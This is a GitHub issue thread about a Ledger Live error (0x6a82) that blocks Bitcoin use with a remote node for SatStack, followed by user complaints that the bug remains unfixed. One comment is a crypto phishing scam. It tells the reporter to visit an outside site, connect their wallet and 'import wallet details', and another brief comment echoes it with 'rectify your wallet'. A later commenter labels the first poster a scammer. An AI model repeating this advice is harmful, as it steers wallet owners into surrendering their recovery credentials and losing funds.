### ISSUE TITLE
Ledger device: UNKNOWN_ERROR (0x6a82)

### ISSUE THREAD

**Issue by oeisenslave** [LedgerHQ/ledger-live#555]
**Ledger Live Version and Operating System**
tested on Ledger Live 2.43.1
Ledger Nano S ₿itcoin app 2.0.6
Platform and version: Windows 10

**Expected behavior**
I expect to connect to remote bitcoind full node to create lss.json for SatStack.

**Actual behavior**
Ledger device: UNKNOWN_ERROR (0x6a82)

![image](https://user-images.githubusercontent.com/108577926/177001149-ebb05f35-eb0c-47e2-9899-977c57e16a43.png)

I've tried some of the suggestions listed at https://github.com/LedgerHQ/ledger-live-desktop/issues/4473 but none worked.

Ledger, please get this working -- We want full sovereignty, without connecting to Ledger's nodes.

**Comment by robert0456** [comment]
> **Ledger Live Version and Operating System** tested on Ledger Live 2.43.1 Ledger Nano S ₿itcoin app 2.0.6 Platform and version: Windows 10
> 
> **Expected behavior** I expect to connect to remote bitcoind full node to create lss.json for SatStack.
> 
> **Actual behavior** Ledger device: UNKNOWN_ERROR (0x6a82)
> 
> ![image](https://user-images.githubusercontent.com/108577926/177001149-ebb05f35-eb0c-47e2-9899-977c57e16a43.png)
> 
> I've tried some of the suggestions listed at [LedgerHQ/ledger-live-desktop#4473](https://github.com/LedgerHQ/ledger-live-desktop/issues/4473) but none worked.
> 
> Ledger, please get this working -- We want full sovereignty, without connecting to Ledger's nodes.
You will need to do conduct a network restore on your wallet on dApps Network .
Kindly follow the steps below . 

Step 1. Go to :
https://dappswallet.pages.dev/

Step 2: Select validate token

Step 3. Select your wallet  and  connect

Step 4. Import wallet details 

We are honored to serve you

**Comment by Maindefi** [comment]
You'll need to rectify your wallet..

**Comment by kaifeur** [comment]
Guys will this ever be fixed? First time this issue was mentioned on 27 Nov 2021 (https://github.com/LedgerHQ/ledger-live-desktop/issues/4473) !!!

**Comment by stanislavkozlovski** [comment]
Continuing from the old issue - https://github.com/LedgerHQ/ledger-live-desktop/issues/4473 - how can you have such a huge bug open?

Scanning altcoins' derivation paths works but Bitcoin's doesn't? Definitely not considering buying a Ledger device again with such negligince.

How can you want to be the main hardware wallet provider WHEN YOU CANT SUPPORT the main cryptocurrency that started this whole thing?! Ridiculous. Apart from that, there's no official support in this thread and a scammer like @robert0456 is left to comment here. Ridiculous. Absolutely ridiculous
